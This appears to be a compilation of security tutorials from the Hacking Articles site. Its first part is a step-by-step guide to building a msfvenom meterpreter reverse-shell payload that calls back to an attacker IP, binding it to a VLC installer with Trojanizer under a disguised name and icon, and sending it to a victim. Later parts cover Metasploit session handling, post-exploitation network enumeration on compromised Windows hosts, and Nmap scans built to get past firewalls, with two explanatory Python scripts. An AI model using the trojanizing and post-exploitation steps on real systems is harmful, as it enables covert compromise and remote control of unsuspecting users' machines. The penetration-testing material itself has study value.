Before running Trojanizer we create a payload with msfvenom.

Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Running Trojanizer

Open the terminal in the Directory where you have cloned the git file. Here you will find a Trojanizer.sh File run it using

Command: ./Trojanizer.sh

Trojanizer has some prerequisites which it will try to install on the initial run. If it cannot install them, you can install the prerequisites mentioned below manually.

Wine, the WinRAR software and Zenity.

After loading, the tool asks whether you want to execute the framework.

Clicking Yes opens a window titled Payload to Be Compressed; here we select the payload we created with msfvenom at the beginning of the practical.

After selecting the payload another window opens, titled Legit Application to Trojanize.

Here we have to select a legitimate, original software file (.exe) to bind with our payload. I am binding the VLC Player installer file with my payload.

After clicking OK we are asked for a new name for the combined file. Keep it like an installer file name, for example vlc-32bit-Installer or vlc-update64, or anything of your choice.

Now we have to select an icon for the combined file. You can choose from the default list or download any icon file (.ico) from Google.

I have downloaded the VLC icon. As you can see in the above image, I am adding the vlc-icon.ico file as the icon.

Note: Trojanizer works with WinRAR, and because of that the chosen icon often does not get applied to the combined file; it shows a WinRAR icon instead. It is a bug we hope will soon be fixed.

After selecting the icon file you will be presented with this window, informing you of the path of the newly combined software and payload.

Now let’s start a listener on the port we set as lport earlier. Open the Metasploit Framework and type

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.111

msf exploit(multi/handler) > set lport 4466

msf exploit(multi/handler) > run

Now send the malicious software to the victim by any means you desire.

When the user opens the file, he is greeted with the normal security warning, as is usually shown.

After clicking Run the user has the VLC installer running and won’t suspect anything.

But as he clicks Run we also get his meterpreter session, as shown below.

That’s how we can bind our payload file with any original software file (.exe) using Trojanizer.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post Bind Payload using SFX archive with Trojanizer appeared first on Hacking Articles.

Comprehensive Guide to Nmap Port Status


Hello friends, you might have used Nmap several times to perform network scanning for enumerating the active port services of a target machine, but in some scenarios you don’t get a simple “open” or “closed” answer for a port.

Let’s Begin

Requirement

Attacker’s IP:  192.168.1.109 [Kali Linux]

Target’s IP: 192.168.1.119 [Ubuntu]

The states of ports are not their essential properties; they describe how Nmap sees them. Nmap divides ports into six states:

Open:  This state means that an application on the target machine is listening for connections/packets on that port.

Closed: This state means the port has no application listening on it, though it could open up at any time.

Filtered: This state means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.

Unfiltered: This state means the port is responsive to Nmap’s probes, but Nmap cannot determine whether it is open or closed.

Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.

Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open Port

In this case a service or application running on the port is actively accepting TCP or UDP connections. We send TCP packets to port 80 of the target machine and find that the port is open.

nmap -p80 192.168.1.119

Looking at Wireshark we find that the following three-way handshake occurs:

  • Nmap sends a SYN packet to port 80
  • Nmap receives a SYN, ACK packet in response from port 80, which denotes that port 80 is open.
  • Nmap sends an RST packet

Closed Port

In this case the port is accessible but no application is listening on it. When a port is in the closed state it replies with an RST, ACK packet when it receives a TCP SYN packet.

nmap -p80 192.168.1.119

Here we used a SYN scan to send TCP SYN packets to port 80 of the target machine and found that the port is closed. That is because as soon as it receives the TCP SYN packet it sends back a TCP RST, ACK packet.

We check Wireshark for more information: as expected, as soon as the target machine received the TCP SYN packet it replied with TCP RST, and Nmap interpreted this as the port being closed.

  • Nmap sends a SYN packet to port 80
  • Nmap receives an RST, ACK packet in response from port 80, which denotes that port 80 is closed.

Filtered Port

In this case Nmap is unable to determine whether the port is open because packet filtering prevents its probes from reaching the port. When a packet is dropped Nmap retries several times, in case the probe was dropped because of network congestion rather than filtering. This slows down the scan dramatically.

Let’s use iptables to drop TCP packets on the target machine.

iptables -I INPUT -p tcp -j DROP

Now when we scan the target machine, our packets are dropped as soon as the target receives them.

nmap -p80 192.168.1.119

In the image below you can observe that it now shows the state “filtered” for port 80.

Looking at Wireshark, we find that when Nmap sends the TCP SYN packet we get no reply from the target machine. This means that a packet filter or firewall is dropping our packets.

Unfiltered Port

The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.

We use iptables to drop any TCP packet destined for port 80 on the target machine.

iptables -I INPUT -p tcp --dport 80 -j DROP

Now we use an Nmap ACK scan against the target machine to check whether there is a firewall.

nmap -sA -p22,80 192.168.1.119

As we can see in the image below, the port without the firewall rule shows as unfiltered, as Nmap is unable to determine whether it is open or closed.

In Wireshark we can see that for port 22 we get an RST packet, whereas for port 80 the packet is dropped by the target machine.

Open|Filtered Port

In this case nmap is unable to determine if a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.

Let’s use an Nmap Xmas scan against the target machine.

nmap -sX -p80 192.168.1.119

As we can see, the Nmap scan shows the port as open|filtered.

We check Wireshark to analyse the packets sent by Nmap and see that we don’t get a reply even though the port is open.

Closed|Filtered Port

This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.

We use iptables on the target machine to drop incoming TCP packets.

iptables -I INPUT -p tcp -j DROP

We run an IP ID idle scan against the target machine using 192.168.1.107 as our zombie.

nmap -p80 -sI 192.168.1.107 192.168.1.119

As we can see, the idle scan through the zombie shows the state closed|filtered for port 80.

An idle scan consists of three steps that are repeated for each port:

  1. Probe the zombie’s IP ID and record it.
  2. Forge a SYN packet from the zombie and send it to the desired port on the target. Depending on the port state, the target’s reaction may or may not cause the zombie’s IP ID to be incremented.
  3. Probe the zombie’s IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1.

In Wireshark we can follow the entire process.
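How Nmap turns each kind of response into one of the six states, as an added example (not code from the article or from Nmap): a Python model of the decision for SYN, ACK, FIN/NULL/Xmas and UDP scans, plus the IP ID comparison from step 3 of the idle scan. The ICMP unreachable codes Nmap treats as filtering are taken from Nmap’s documented behaviour; the scenario in the demonstration is the article’s iptables DROP rule.

```python
from dataclasses import dataclass
from typing import Optional

# TCP flag bits as found in byte 13 of the TCP header.
SYN, RST, ACK = 0x02, 0x04, 0x10

# ICMP type 3 (destination unreachable) codes that Nmap reads as a filtering
# device answering for the target (net/host/port/admin-prohibited variants).
FILTERING_UNREACH_CODES = {1, 2, 3, 9, 10, 13}
PORT_UNREACHABLE = 3


@dataclass(frozen=True)
class Response:
    """One packet received for a probe; a dropped probe is represented by None."""
    proto: str                        # "tcp", "udp" or "icmp"
    tcp_flags: int = 0                # flag bits when proto == "tcp"
    icmp_type: Optional[int] = None   # set when proto == "icmp"
    icmp_code: Optional[int] = None


def _icmp_unreachable(r: Response) -> bool:
    return r.proto == "icmp" and r.icmp_type == 3 and r.icmp_code in FILTERING_UNREACH_CODES


def _tcp_has(r: Response, bits: int) -> bool:
    return r.proto == "tcp" and (r.tcp_flags & bits) == bits


def classify(scan: str, response: Optional[Response]) -> str:
    """Map (scan type, response) to the state string Nmap prints.

    scan: "syn" (-sS) or "connect" (-sT), "ack" (-sA),
          "fin"/"null"/"xmas" (-sF/-sN/-sX), "udp" (-sU).
    A DROP rule on the target yields silence (None) while a closed port or a
    REJECT yields RST: that is why DROP turns a port "filtered" and costs Nmap
    several retransmissions, whereas an RST settles the state immediately.
    """
    if scan in ("syn", "connect"):
        if response is None or _icmp_unreachable(response):
            return "filtered"
        if _tcp_has(response, SYN | ACK):
            return "open"
        if _tcp_has(response, RST):
            return "closed"
    elif scan == "ack":
        # ACK scan never learns open vs closed: an RST only proves the port
        # is reachable ("unfiltered"); silence means something dropped it.
        if response is None or _icmp_unreachable(response):
            return "filtered"
        if _tcp_has(response, RST):
            return "unfiltered"
    elif scan in ("fin", "null", "xmas"):
        # Open ports stay silent (RFC 793), so silence is ambiguous.
        if response is None:
            return "open|filtered"
        if _icmp_unreachable(response):
            return "filtered"
        if _tcp_has(response, RST):
            return "closed"
    elif scan == "udp":
        if response is None:
            return "open|filtered"
        if response.proto == "udp":
            return "open"
        if response.proto == "icmp" and response.icmp_type == 3:
            if response.icmp_code == PORT_UNREACHABLE:
                return "closed"
            if response.icmp_code in FILTERING_UNREACH_CODES:
                return "filtered"
    else:
        raise ValueError(f"unknown scan type: {scan}")
    return "unknown"   # e.g. an unexpected flag combination


def idle_scan_state(ipid_before: int, ipid_after: int) -> str:
    """Step 3 of the idle scan: compare the zombie's IP ID before and after.

    An open target port answers the spoofed SYN with SYN/ACK, the zombie
    replies RST, and its IP ID advances by 2 (our probe reply plus that RST).
    A closed or filtered port causes no extra zombie packet, so the IP ID
    advances by 1; Nmap cannot tell the two apart, hence closed|filtered.
    """
    delta = (ipid_after - ipid_before) % 65536   # IP ID is a 16-bit counter
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return "unknown"   # zombie busy with other traffic; result unreliable


if __name__ == "__main__":
    # The article's "iptables -I INPUT -p tcp -j DROP" experiment as seen by each scan.
    for scan in ("syn", "ack", "xmas"):
        print(f"{scan:4s} scan, probe dropped -> {classify(scan, None)}")
    print("ack scan, RST from port 22 ->", classify("ack", Response("tcp", RST)))
    print("idle scan, zombie IP ID 4135 -> 4136 ->", idle_scan_state(4135, 4136))
```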

Source: https://nmap.org/book/man.html

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Comprehensive Guide to Nmap Port Status appeared first on Hacking Articles.

Sessions Command in Metasploit


Today we are going to learn about the sessions command of the Metasploit Framework. The sessions command helps us interact with and manipulate the various sessions created through exploits. It is usually used just to get into a session, but it is far more useful than that: it can run a single command on multiple sessions, and it can also upgrade a normal shell to Meterpreter.

Requirement

Attacker: Kali Linux

Targets: Any operating system

Open a Kali Linux terminal and type msfconsole to load the Metasploit Framework. Now you need to compromise the victim’s machine once to obtain a session of any type, either Meterpreter or shell; to do so you can read our previous article here.

Once you have obtained a session on the victim’s machine, you can perform many operations on the victim’s system to retrieve important information. Using the help option we can check the list of options that can be used with the sessions command.

Command: sessions -h

In the image below you can observe that it shows many options which will be quite useful for system enumeration.

Run a command in multiple sessions

We can run arbitrary OS commands on multiple Meterpreter sessions at once using the sessions command.

Syntax: sessions -c [command] -i [Session IDs]

Command: sessions -c hostname -i 1,2,3

As you can see in the screenshot below, the hostname command ran on sessions 1, 2 and 3, giving us the hostnames of the respective systems.

Session ID   Victim’s IP      Hostname
1            192.168.1.107    Pc21-PC
2            192.168.1.114    Pavan
3            192.168.1.113    PD-Laptop

Get Detailed Information about Sessions

Use the verbose option to obtain complete details of each session: it describes the type of session achieved (Meterpreter or shell), the target system’s hostname, and so on.

Command: sessions -v

In the image below you can observe the output of the sessions command with the verbose option.

Run a Script or a Module in Multiple Sessions

Syntax: sessions -s [script-name]

Command: sessions -s winenum

As you can see in the screenshot above, the winenum script ran on sessions 4, 5 and 6, enumerating data from the respective systems and saving the output as text files in the pavan17.1611 folder.

Explore the highlighted path ./root/.msf4/logs/scripts/winenum/pavan to obtain the output text files; in the image below you can observe that it shows all the text files containing the output of the command executed above.

In the image below you can read the information stored inside the ipconfig—all.txt file for network configuration.

Assign Name to Sessions

We can name sessions anything we want so as to differentiate between them. To name a session use the following command.

Syntax: sessions -n [Name] -i [Session ID]

Command: sessions -n Yondu -i 1

In the image below you can observe that we have successfully named session 1 ‘Yondu’; the name Yondu now refers to session ID 1.

Kill a Particular Session

If we want to close a particular session, we can do so using the kill option with that session ID.

Syntax: sessions -k [Session ID]

Command: sessions -k 3

As you can see in the screenshot, we have closed session 3 using the sessions command.

Kill All Sessions

If we want to close all the sessions, we can do so using the kill-all option (-K) without specifying any session ID.

Command: sessions -K

As you can see in the screenshot, we have closed all the sessions using the sessions command.

Upgrading a Shell to Meterpreter

Many times while exploiting a system directly we get only a plain shell on the remote system, but because of the vast capabilities of Meterpreter we want a Meterpreter shell instead. We can upgrade a normal shell to a Meterpreter shell using the sessions command.

First let’s gain a shell; here I am using a direct exploit, as shown in the screenshot, which when executed gives us a shell on the server.

You can clearly see that we have a Linux shell as session #1. Now let’s upgrade this shell to a Meterpreter shell.

First press “Ctrl+Z” to send this shell to the background, then use the upgrade option with the session ID as shown in the following sessions command.

Command: sessions -u 1

As you can see in the image, the Meterpreter shell is opened as session #2.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Contact here

The post Sessions Command in Metasploit appeared first on Hacking Articles.

Manual Post Exploitation on Windows PC (Network Command)


Hello friends!! Today you will learn how to enumerate network information from a Windows system once it has been compromised by an attacker.

Requirement

Attacker: Kali Linux

Targets: Windows operating system

Open a Kali Linux terminal and type msfconsole to load the Metasploit Framework. Now you need to compromise the victim’s machine once to obtain a session of any type, either Meterpreter or shell; to do so you can read our previous article here. For post exploitation we will need an administrator-privileged shell, which can be obtained as described here.

Get Information about Network Cards

We can enumerate information about the network interface cards using the systeminfo command.

Information that can be extracted:

Number of NIC Cards, Manufacturer of NIC Cards, Model, Type (Wireless or LAN).

Command: systeminfo | findstr Network

In the image below you can observe that 2 network interface cards are installed.

ARP

ARP, the Address Resolution Protocol, maps IP addresses to the MAC addresses of devices. Using the arp command we can enumerate the MAC addresses of other systems on the same network as the victim’s system.

Here we use [-a] to list all the entries of the ARP cache.

Command: arp -a

In the image below you can see the MAC addresses stored in the ARP table.

Get DNS Cache

We can enumerate the DNS resolver cache using the ipconfig command.

The DNS resolver cache is a temporary database maintained by the operating system. It contains records of all recent visits or attempted visits to websites and other internet domains.

Here we use [/displaydns] to display the complete DNS cache.

Command: ipconfig /displaydns

In the image below you can observe that the output contains the following:

Record Name: The name with which the DNS query was initiated

Record Type: A number representing the record type (1 is for an IPv4 A record and 28 is for an IPv6 AAAA record)

Time To Live: Time in seconds after which the cache entry will expire

Data Length: Length of the data in bytes; an IPv4 address has 4 bytes and an IPv6 address 16 bytes

A/AAAA Record: A is the IPv4 address record and AAAA the IPv6 address record (four As because the address is four times the size of an IPv4 address)

 

Display all the Connections and Listening Ports on a System

While penetration testing a remote PC, knowledge of all the connections and listening ports along with the process IDs is essential so that we can migrate the session if needed.

This can be done using the netstat command.

Here we use the following options with netstat:

[-a] to display all connections and listening ports

[-n] to display address and port number numerically

[-o] to display the owning process ID

Syntax/Example: netstat -ano

Display All the TCP Connections

To enumerate all the TCP connections we again use netstat with the following options:

[-a] to display all connections and listening ports

[-n] to display addresses and port numbers in numeric form

We use the findstr command to filter out the connections that mention TCP.

Command: netstat -na | findstr TCP

In the image below you can observe all the states of TCP connections, i.e. Listening, Established and Close Wait, on their respective port numbers.

Display All the UDP Connections

To enumerate all the UDP connections we again use netstat with the following options:

[-a] to display all connections and listening ports

[-n] to display addresses and port numbers in numeric form

We use the find command to filter out the connections that mention UDP.

Syntax/Example: netstat -na | find "UDP"

Similarly, in the image below you can observe that for UDP the state is left blank and the foreign address shows *:*, which means no UDP connection is established.

 

Display All the Established Connections

While penetration testing a remote PC, knowledge of all established connections is also essential. This can be done using the netstat command.

Here we use the following options with netstat:

[-n] to display addresses and port numbers in numeric form

[-a] to display all connections and listening ports

We use the find command to filter out the connections whose state is ESTABLISHED.

Command: netstat -na | find "ESTABLISHED"

In the image below you can observe that it shows the established TCP connections between source IP and port and destination IP and port.

Display the Routing Tables

While penetration testing a remote PC, knowledge of the routing tables is essential because they hold the routes chosen by the routing algorithm as preferred routes for packet forwarding, and they give information about the netmasks and gateways too.

It contains the Interface List, IPv4 Route Table, Persistent Routes, IPv6 Route Table.

This can be done using the netstat command.

Here we use the following options with netstat:

[-n] to display addresses and port numbers in numeric form

[-r] to display the routing table

Command: netstat -nr

Get Executables Which Created Connections

While penetration testing a remote PC, knowing which executable created each connection or listening port, together with the addresses, port numbers and owning process IDs, is very useful, because it ties each connection and port to a process.

This can be done using the netstat command.

Here we use the following options with netstat:

[-b] to display the executable involved in creating each connection or listening port

[-a] to display all connections and listening ports

[-n] to display addresses and port numbers in numeric form

[-o] to display the owning process ID associated with each connection

Command: netstat -bano

In the image below you can observe that it shows the name of the program that owns each port.

Get All the Adapters

We can enumerate all the adapters connected to the victim’s system by using the ipconfig command.

As the output of ipconfig is very long, we use the findstr command to filter out just the lines about the adapters.

Command: ipconfig | findstr adapter

Get All the Addresses

We can enumerate all the addresses, including IPv4 and IPv6, by using the ipconfig command.

As the output of ipconfig is very long, we use the findstr command to filter out just the lines containing addresses.

Command: ipconfig | findstr Address

Get the Basic IP Details

We can get the basic network configuration of the victim’s system and of the network it is connected to through the ipconfig command.

[/all] is used to display the full ipconfig information

Syntax: ipconfig /all

The victim system is connected to Wi-Fi, so its properties can be viewed below.

Things to enumerate:

Adapter Name, Model, Type, MAC Address, IPv4 Address, IPv6 Address, Subnet Mask, DHCP Server, Default Gateway and much more.

Ping Sweep

A ping sweep is a networking technique to find the active hosts in a range of addresses on the network.

IP addresses from which we get a reply are active; the rest are not.

Command: for /L %i in (100,1,225) do ping 192.168.1.%i | findstr TTL

In the image below you can observe the result of the multiple ping responses across the network using the ping command loop.

UDP Statistics

In order to obtain UDP statistics we can execute the command given below, which describes the UDP traffic sent and received.

Command: netstat -s -p udp

[-s] denotes the statistics option

[-p] denotes the protocol

In the image below you can observe that it shows details such as datagrams received, receive errors, and so on.

TCP Statistics

In order to obtain TCP statistics we can execute the command given below, which describes the TCP traffic sent and received.

Command: netstat -s -p TCP

[-s] denotes the statistics option

[-p] denotes the protocol

In the image below you can observe that it shows details such as segments received, failed connection attempts, reset connections, and so on.

Display Connections Sorted by Port

Options Used:

[-a]: To display all active TCP connections and the TCP and UDP ports on which the computer is listening

[-n]: Addresses and port numbers are displayed numerically

[-o]: Display connections with process IDs

We use findstr to filter the results for port 443. Note that findstr matches the string anywhere on the line, so a PID or another port number containing 443 would also be listed.

Command: netstat -ano | findstr 443

In the image below you can observe that it shows the TCP connection state only for port 443.
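The netstat output read throughout this section is easier to triage once it is parsed, so here is an added example (not code from the article or from Windows) that turns `netstat -ano` output into records and answers the questions asked above: which connections are established, what each PID listens on, which lines involve a given port, and which established peers lie outside private address space. The sample output is constructed for the example and laid out like Windows netstat.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of `netstat -ano` output in the Windows column layout;
# not captured from a real host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.107:49712    192.168.1.111:4466     ESTABLISHED     2316
  TCP    192.168.1.107:49720    104.16.0.10:443        ESTABLISHED     5044
  TCP    192.168.1.107:50443    10.0.0.7:8080          ESTABLISHED     7788
  TCP    192.168.1.107:49733    192.168.1.5:445        CLOSE_WAIT      4
  TCP    [::]:135               [::]:0                 LISTENING       880
  UDP    0.0.0.0:500            *:*                                    1124
  UDP    [::1]:1900             *:*                                    3500
"""


@dataclass(frozen=True)
class Connection:
    proto: str
    local_host: str
    local_port: int
    remote_host: str
    remote_port: Optional[int]   # None for the "*:*" shown on UDP sockets
    state: str                   # "" for UDP, which has no connection state
    pid: int


def _split_endpoint(endpoint: str):
    """'192.168.1.107:49712' -> ('192.168.1.107', 49712); '[::]:135' -> ('::', 135)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> List[Connection]:
    """Parse `netstat -ano` text; header, blank and malformed lines are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            proto, local, remote, state, pid = parts
        elif len(parts) == 4 and parts[0] == "UDP":
            proto, local, remote, pid = parts
            state = ""
        else:
            continue
        lhost, lport = _split_endpoint(local)
        rhost, rport = _split_endpoint(remote)
        if lport is not None:
            conns.append(Connection(proto, lhost, lport, rhost, rport, state, int(pid)))
    return conns


def established(conns: List[Connection]) -> List[Connection]:
    """Structured equivalent of `netstat -na | find "ESTABLISHED"`."""
    return [c for c in conns if c.state == "ESTABLISHED"]


def listening_ports(conns: List[Connection]) -> Dict[int, List[int]]:
    """PID -> sorted TCP ports it listens on, IPv4 and IPv6 sockets merged."""
    ports: Dict[int, set] = {}
    for c in conns:
        if c.state == "LISTENING":
            ports.setdefault(c.pid, set()).add(c.local_port)
    return {pid: sorted(p) for pid, p in ports.items()}


def by_port(conns: List[Connection], port: int) -> List[Connection]:
    """Connections whose local or remote port equals `port`.

    `findstr 443` matches the digits anywhere on the line (local port 50443,
    a PID such as 4430, ...); this compares the parsed port fields instead.
    """
    return [c for c in conns if port in (c.local_port, c.remote_port)]


def external_established(conns: List[Connection]) -> List[Connection]:
    """Established connections whose peer is outside private and loopback space."""
    result = []
    for c in established(conns):
        addr = ipaddress.ip_address(c.remote_host)
        if not (addr.is_private or addr.is_loopback):
            result.append(c)
    return result


if __name__ == "__main__":
    conns = parse_netstat(SAMPLE_NETSTAT)
    print("listening :", listening_ports(conns))
    print("port 443  :", [(c.remote_host, c.pid) for c in by_port(conns, 443)])
    print("external  :", [(c.remote_host, c.remote_port, c.pid) for c in external_established(conns)])
```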

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Manual Post Exploitation on Windows PC (Network Command) appeared first on Hacking Articles.

Understanding Guide for Nmap Ping Scan (Firewall Bypass)


In this article we are going to scan the target machine with different Nmap ping scans, and the packets sent and received by each scan can be confirmed by analysing the Nmap traffic in Wireshark.

A ping scan in Nmap checks whether the target host is alive. As we know, ping by default sends an ICMP echo request and gets an ICMP echo reply if the system is alive. On a local network an Nmap ping scan instead sends an ARP request by default and uses the response to check whether the host is up.

Nmap scans change their behaviour according to the network they are scanning.

  • When scanning a local network Nmap sends an ARP request with every scan
  • When an external network is scanned, Nmap sends the following probe packets:
  1. ICMP echo request
  2. ICMP timestamp request
  3. TCP SYN to port 443
  4. TCP ACK to port 80

In this article we use the --disable-arp-ping option to change the behaviour of Nmap scans so that a local network is treated as a public network.

Let’s Start!!

Ping Sweep

In order to identify live hosts without using ARP request packets, Nmap’s -sP option, known as a ping sweep, is used. We can also use the -sn flag, which means no port scan, also known as a ping scan.

nmap -sP 192.168.1.104 --disable-arp-ping

or

nmap -sn 192.168.1.104 --disable-arp-ping

In the image below you can observe that it found 1 host up. Since we have disabled ARP requests for local network scans with the --disable-arp-ping parameter, Nmap treats the target as an external network and behaves as discussed above.

Demonstrating the working of the ping sweep with Wireshark

In the image below you can observe the following request and reply packets between the two IP addresses:

  1. ICMP echo request
  2. TCP SYN to port 443
  3. TCP ACK to port 80
  4. ICMP timestamp request
  5. ICMP echo reply
  6. TCP RST, ACK to port 443
  7. TCP RST to port 80
  8. ICMP timestamp Reply

Block Ping Sweep Scan

Now let’s add some firewall rules in iptables to drop ICMP packets, TCP SYN packets to port 443 and TCP ACK packets to port 80, which will block the ping sweep scan.

sudo iptables -I INPUT -p ICMP -j DROP

sudo iptables -I INPUT -p tcp --tcp-flags ALL ACK --dport 80 -j DROP

sudo iptables -I INPUT -p tcp --tcp-flags ALL SYN --dport 443 -j DROP

Now repeat the ping sweep scan to identify the state of the host. In the image below you can observe that this time it shows 0 hosts up, which means the firewall has blocked the packets sent by this scan.

Demonstrating the request packets of the ping sweep scan again with Wireshark: if you look at the image below you will find that this time no reply packet was received.

Bypass Ping Sweep Filter using TCP SYN Ping

Now we’ll try to bypass the firewall rules by using a ping scan with TCP SYN packets, for which we use the -PS option. -PS sends a TCP SYN packet to port 80 by default; we can change this by specifying the ports with it, like -PS443.

nmap -sP -PS 192.168.1.104 --disable-arp-ping

In the image below you can observe that it found 1 host up.

In the image below you can observe that the result looks like an Nmap stealth scan. It follows the TCP half-open connection mechanism: a SYN packet is sent to port 80, a SYN, ACK is received from port 80, and then an RST packet is sent to reset the connection.

The difference between the -sP probe on port 80 and the -PS probe on port 80 is as follows:

  • The ping sweep scan [-sP] sends a TCP ACK packet to port 80; the hex value of the ACK flag is 10, and as reply from the host machine it receives an RST packet whose hex value is 4.
  • The TCP SYN ping scan sends a TCP SYN packet to port 80, whose hex value is 2; as reply it receives a SYN, ACK packet whose value is the sum of the two flags’ hex values, i.e. 2 + 10 = 12, and it is able to bypass the firewall rule applied above on port 80 for TCP ACK packets.

Block TCP SYN Ping Scan

Sometimes network admins apply a filter like the one below using iptables to drop all SYN packets that would initiate a TCP connection to any TCP port on their network.

sudo iptables -I INPUT -p tcp --tcp-flags ALL SYN -j DROP

As a result it blocks the Nmap TCP SYN ping probes, so that Nmap cannot identify the state of the live host.

Now repeat the TCP SYN ping to identify the state of the host. In the image below you can observe that this time it shows 0 hosts up, which means the firewall has blocked the packets sent by this scan.

Bypass TCP SYN Ping using TCP ACK Ping

To bypass this we’ll use a ping scan with TCP ACK packets, for which we use the -PA option. -PA sends a TCP ACK packet to port 80 by default; we can change this by specifying the ports with it, like -PA443.

nmap -sP -PA 192.168.1.104 --disable-arp-ping

In the image below you can observe that it found 1 host up.

If you look at the packets captured by Wireshark below, you will find that here an ACK packet is sent to port 80 and an RST packet is received from port 80 in reply.

Block TCP ACK Ping Scan

Sometimes network admins apply a filter like the one below using iptables to drop all ACK packets belonging to established TCP connections on any TCP port on their network.

sudo iptables -I INPUT -p tcp --tcp-flags ALL ACK -j DROP

As a result it blocks the Nmap TCP ACK ping probes, so that Nmap cannot identify the state of the live host.

Now repeat the TCP ACK ping to identify the state of the host. In the image below you can observe that this time it shows 0 hosts up, which means the firewall has blocked the packets sent by this scan.

Bypass TCP ACK Ping using ICMP Echo

In some scenarios network admins apply firewall filters on TCP flags to resist unwanted TCP communication on the network; here let’s consider that the network admin has blocked TCP communication by filtering on the SYN as well as the ACK flag.

To bypass this rule we’ll use a ping scan with ICMP packets, for which we use the -PE option. -PE sends an ICMP echo request packet [ICMP type 8] and expects an ICMP echo reply packet [ICMP type 0].

nmap -sP -PE 192.168.1.104 --disable-arp-ping

In the image below you can observe that it found 1 host up.

Block ICMP Echo Ping Scan

Usually most network admins apply an ICMP filter on their network so that other systems or networks cannot ping it.

sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP

As a result it blocks the Nmap ICMP echo ping probes, so that Nmap cannot identify the state of the live host.

Now repeat the ICMP echo ping to identify the state of the host. In the image below you can observe that this time it shows 0 hosts up, which means the firewall has blocked the packets sent by this scan.

Demonstrating the Nmap ICMP echo ping with Wireshark shows only the ICMP request packets on the network, with no reply packet received from the host, as shown in the image below.

Bypass ICMP Echo Ping using ICMP Timestamp Ping

To bypass this rule we’ll use a ping scan with a different ICMP type, for which we use the -PP option. -PP sends an ICMP timestamp request packet [ICMP type 13] and expects an ICMP timestamp reply packet [ICMP type 14].

nmap -sP -PP 192.168.1.104 --disable-arp-ping

In the image below you can observe that it found 1 host up.

Demonstrating the Nmap ICMP timestamp ping with Wireshark shows the ICMP timestamp request packet sent on the network and the timestamp reply packet received from the host, as shown in the image below.

Block ICMP Ping Scan

It might be that the network admin has blocked all ICMP message types by dropping all ICMP packets with the following iptables filter.

sudo iptables -I INPUT -p ICMP -j DROP

As a result it blocks the Nmap ICMP ping probes, so that Nmap cannot identify the state of the live host.

Now repeat the ICMP ping, either -PP or -PE, to identify the state of the host. In the image below you can observe that this time it shows 0 hosts up, which means the firewall has blocked the packets sent by this scan.

Bypass ICMP Ping Scan using UDP Ping

We have seen multiple ways to check if the system is live. Now, you can determine whether a system is up or not whether it is on local network or public network.

We have observed that a ping scan with ICMP does not work when ICMP is filtered, and if a TCP packet filter is also enabled on the host network it becomes difficult to identify live hosts; to bypass such rules we’ll use a ping scan with UDP packets, for which we use the -PU option.

-PU sends a UDP packet to the specified port, or to port 40125 by default when no port is given; an ICMP reply such as “ICMP destination unreachable” means the host is live.

nmap -sP -PU 192.168.1.104 --disable-arp-ping

In the image below you can observe that it found 1 host up.

Demonstrating the Nmap UDP ping with Wireshark shows the UDP request packet sent to port 40125 and the ICMP destination unreachable reply received from the host, as shown in the image below.

Block UDP and Ping Sweep

Now let’s add firewall rules in iptables to drop ICMP packets, TCP SYN packets to port 443 and TCP ACK packets to port 80, which block the ping sweep scan, and also drop UDP packets. The network admin might also have blocked all TCP packets.

sudo iptables -I INPUT -p ICMP -j DROP

sudo iptables -I INPUT -p tcp --tcp-flags ALL ACK --dport 80 -j DROP

sudo iptables -I INPUT -p tcp --tcp-flags ALL SYN --dport 443 -j DROP

sudo iptables -I INPUT -p udp -j DROP

As a result it will resist Nmap’s TCP ping, ICMP ping and UDP ping, so that Nmap cannot identify the state of the live host.

Now repeat the UDP ping to identify the state of the host. In the image below you can observe that this time it shows 0 hosts up, which means the firewall has blocked the packets sent by this scan.

Bypass UDP and Ping Sweep using Protocol Scan

Using Protocol Ping scan we can identify live host when ICMP, TCP and UDP has been blocked, for that we’ll use –PO attribute. –PO sends IP packet with the particular protocol number place in their IP header, If no protocols are precise, the default is to send multiple IP packets for ICMP (protocol 1), IGMP (protocol 2), and IP-in-IP (protocol 4).

nmap -sP -PO 192.168.1.104 --disable-arp-ping

From the image given below you can observe that it found 1 host up.

From the Wireshark capture in the image below we can observe the sequence followed by the protocol ping scan:

  • Send ICMP echo to the host network
  • Send IGMP query to the host network
  • Send IPv4 (IP-in-IP) packet to the host network
  • ICMP destination unreachable received as reply from the host
